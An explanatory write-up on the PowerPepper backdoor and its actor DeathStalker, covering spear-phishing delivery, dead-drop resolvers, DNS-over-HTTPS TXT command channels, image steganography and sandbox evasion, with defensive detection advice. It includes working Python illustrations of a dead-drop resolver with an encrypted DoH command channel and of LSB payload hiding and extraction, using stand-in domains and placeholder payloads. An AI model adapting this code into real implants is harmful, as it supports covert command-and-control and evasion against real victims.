PowerPepper is a Windows in-memory PowerShell backdoor that executes shell commands sent to it remotely. It is attributed to DeathStalker (formerly tracked as Deceptikons), a threat actor known to be active since 2012. The actor has consistently used "dead-drop resolvers" (DDRs): obfuscated content posted on major public web services such as YouTube, Twitter or Reddit that, once decoded by the malware, reveals a command-and-control (C2) server address. Because the implant only ever fetches a popular, legitimate site, the lookup itself blends into normal traffic and the operator can rotate C2 addresses by editing a post.
A PowerPepper attack starts with a spear-phishing email carrying a malicious attachment, a link to a public file-sharing service, or simply a Windows LNK (shortcut) file. When executed, the delivery chain downloads and runs the PowerPepper PowerShell implant (Powersing is a separate, earlier DeathStalker implant and is not what this chain delivers). The backdoor uses DNS over HTTPS (DoH) as its communications channel: encrypted shell commands from an attacker-controlled server are carried in DNS TXT records, and because the lookups go to a public resolver over HTTPS, the C2 exchange looks like ordinary web traffic rather than DNS on the wire.
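The following is an added example, written for this page and not PowerPepper's own code, showing how a dead-drop resolver and a DoH TXT-record command channel fit together end to end. The DDR token framing (a marker followed by reversed base64), the "idx/total:payload" record chunking, the toy SHA-256 keystream cipher, the pre-shared key and the domain ns1.example.test are all assumptions chosen for illustration; only the request shape and the application/dns-json answer layout follow Cloudflare's public DoH JSON API. The resolver reply is constructed inline so the script runs offline.

```python
"""Added illustration of a dead-drop resolver feeding a DNS-over-HTTPS TXT
command channel. None of this is PowerPepper's code: the DDR framing, the
record chunking and the toy keystream cipher are assumptions for the example."""
from __future__ import annotations

import base64
import hashlib
import re
from urllib.parse import urlencode

DDR_MARKER = "DDR:"  # assumed token framing inside an innocuous public post
DOH_RESOLVER = "https://cloudflare-dns.com/dns-query"  # Cloudflare's public JSON DoH API


def encode_ddr(c2_domain: str) -> str:
    """Operator side: publish a C2 domain as a reversed-base64 token."""
    return DDR_MARKER + base64.b64encode(c2_domain.encode())[::-1].decode()


def resolve_ddr(page_text: str) -> str | None:
    """Implant side: locate the token in fetched page text and recover the domain."""
    m = re.search(re.escape(DDR_MARKER) + r"([A-Za-z0-9+/=]+)", page_text)
    if not m:
        return None
    domain = base64.b64decode(m.group(1)[::-1].encode()).decode(errors="replace")
    # Only accept something that looks like a hostname; anything else is noise.
    return domain if re.fullmatch(r"[A-Za-z0-9.-]+", domain) else None


# Constructed stand-in for a video description or comment that carries the token.
SAMPLE_PUBLIC_POST = (
    "Great tutorial, thanks for sharing!\n"
    + encode_ddr("ns1.example.test") + "\n"
    "See you next week.\n"
)


def build_doh_request(qname: str) -> tuple[str, dict[str, str]]:
    """The lookup the implant issues: a plain HTTPS GET to a public resolver,
    so no cleartext DNS for the C2 name ever leaves the host."""
    url = DOH_RESOLVER + "?" + urlencode({"name": qname, "type": "TXT"})
    return url, {"accept": "application/dns-json"}


def _keystream(key: bytes, n: int) -> bytes:
    """Toy SHA-256 counter keystream standing in for the real, unspecified cipher."""
    out = b""
    ctr = 0
    while len(out) < n:
        out += hashlib.sha256(key + ctr.to_bytes(4, "big")).digest()
        ctr += 1
    return out[:n]


def _xor(data: bytes, key: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, _keystream(key, len(data))))


def encode_command(cmd: str, key: bytes, chunk: int = 60) -> list[str]:
    """C2 side: encrypt a shell command and split it into numbered TXT records
    ("idx/total:payload") so it survives reordering of the answer section."""
    blob = base64.b64encode(_xor(cmd.encode(), key)).decode()
    parts = [blob[i:i + chunk] for i in range(0, len(blob), chunk)]
    return [f"{i:02d}/{len(parts):02d}:{p}" for i, p in enumerate(parts)]


def fake_doh_answer(qname: str, txt_records: list[str]) -> dict:
    """Constructed resolver reply in the shape the dns-json API uses
    (type 16 = TXT, data carried as a quoted string)."""
    return {
        "Status": 0, "TC": False, "RD": True, "RA": True, "AD": False, "CD": False,
        "Question": [{"name": qname, "type": 16}],
        "Answer": [{"name": qname, "type": 16, "TTL": 60, "data": f'"{r}"'}
                   for r in txt_records],
    }


def decode_command(doh_json: dict, key: bytes) -> str:
    """Implant side: collect TXT records from the DoH reply, reorder, decrypt."""
    ordered: dict[int, str] = {}
    expected = None
    for answer in doh_json.get("Answer", []):
        if answer.get("type") != 16:
            continue
        header, payload = answer["data"].strip('"').split(":", 1)
        idx, total = (int(x) for x in header.split("/"))
        expected = total
        ordered[idx] = payload
    if expected is None or len(ordered) != expected:
        raise ValueError("incomplete command: %d of %s records" % (len(ordered), expected))
    blob = "".join(ordered[i] for i in sorted(ordered))
    return _xor(base64.b64decode(blob), key).decode()


if __name__ == "__main__":
    c2 = resolve_ddr(SAMPLE_PUBLIC_POST)
    qname = "task." + c2
    url, headers = build_doh_request(qname)
    key = b"shared-secret"  # assumed pre-shared key
    reply = fake_doh_answer(qname, encode_command("whoami /all", key))
    print(c2, url, headers, decode_command(reply, key), sep="\n")
```

The defensive takeaway is in what the two functions leave on the network: a fetch of a popular site and an HTTPS session to a public resolver. Neither shows the C2 name in cleartext, so detection has to come from the host (a PowerShell process talking to a DoH endpoint, or TXT lookups for long, high-entropy names in resolver or EDR telemetry) rather than from DNS logs alone.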
PowerPepper also adds steganography, the practice of hiding data inside images, to its list of evasion techniques. Here the malicious code is embedded in what appear to be ordinary pictures of ferns or peppers (hence the name) and is extracted by a loader script, so the image itself passes casual inspection and content filters that only look for executable formats. The loader is disguised as a verification tool from GlobalSign, the certificate authority and identity services provider.
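To make the steganography step concrete, here is an added example of generic least-significant-bit (LSB) embedding over raw RGB pixels together with the matching extractor a loader would use. It is written for this page and is not PowerPepper's own scheme: the 4-byte length prefix, the MSB-first bit order and the gradient "cover image" are all constructed assumptions, and the payload is a placeholder string rather than a real script.

```python
"""Added illustration of the steganography step: a payload hidden in the
least-significant bits of raw RGB pixels and pulled back out by a loader.
This is generic LSB embedding written for the example, not PowerPepper's own
scheme; the 4-byte length prefix and bit order are assumptions."""
from __future__ import annotations

import struct


def make_cover(width: int, height: int) -> bytes:
    """Constructed 'photo' stand-in: a flat RGB gradient, not a real image file."""
    px = bytearray()
    for y in range(height):
        for x in range(width):
            px += bytes((x * 255 // max(width - 1, 1), y * 255 // max(height - 1, 1), 96))
    return bytes(px)


def lsb_embed(cover: bytes, payload: bytes) -> bytes:
    """Operator side: overwrite the low bit of each cover byte with one payload bit,
    MSB first, after a big-endian 4-byte length so the loader knows where to stop."""
    framed = struct.pack(">I", len(payload)) + payload
    if len(framed) * 8 > len(cover):
        raise ValueError("cover too small: need %d carrier bytes" % (len(framed) * 8))
    out = bytearray(cover)
    for i, byte in enumerate(framed):
        for bit in range(8):
            pos = i * 8 + bit
            out[pos] = (out[pos] & 0xFE) | ((byte >> (7 - bit)) & 1)
    return bytes(out)


def lsb_extract(stego: bytes) -> bytes:
    """Loader side: read the length field, then exactly that many payload bytes."""
    def read(offset_bits: int, n: int) -> bytes:
        data = bytearray()
        for i in range(n):
            b = 0
            for bit in range(8):
                b = (b << 1) | (stego[offset_bits + i * 8 + bit] & 1)
            data.append(b)
        return bytes(data)

    (length,) = struct.unpack(">I", read(0, 4))
    if 32 + length * 8 > len(stego):
        # A picture that carries nothing yields a meaningless length here;
        # refuse rather than read past the end of the buffer.
        raise ValueError("declared length %d exceeds carrier capacity" % length)
    return read(32, length)


def cover_distortion(cover: bytes, stego: bytes) -> int:
    """Largest per-channel change the embedding made; 1 means visually invisible."""
    return max(abs(a - b) for a, b in zip(cover, stego))


if __name__ == "__main__":
    cover = make_cover(64, 64)  # 12288 carrier bytes -> up to 1532 payload bytes
    script = b"Write-Output 'stage two would run here'"  # constructed placeholder payload
    stego = lsb_embed(cover, script)
    print(lsb_extract(stego).decode(), "max channel delta:", cover_distortion(cover, stego))
```

Two practical points follow from the code. Each channel value moves by at most one, which is why a stego picture of a fern is indistinguishable by eye and why file-type or signature scanning of the image is useless; the detection opportunity is the loader, which has to read pixel data and hand the result to an interpreter, a behaviour that is easy to flag in script-block logging.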
It uses custom obfuscation, with parts of its malicious delivery scripts hidden in objects embedded in the Word document. It tries to evade detection and sandbox execution with a range of checks, such as looking for mouse movement (an idle cursor suggests an automated analysis box), filtering on the client's MAC address, and adapting its execution flow depending on which antivirus products it detects.
PowerPepper Malspam Document Signatures
PowerPepper Malspam Document Download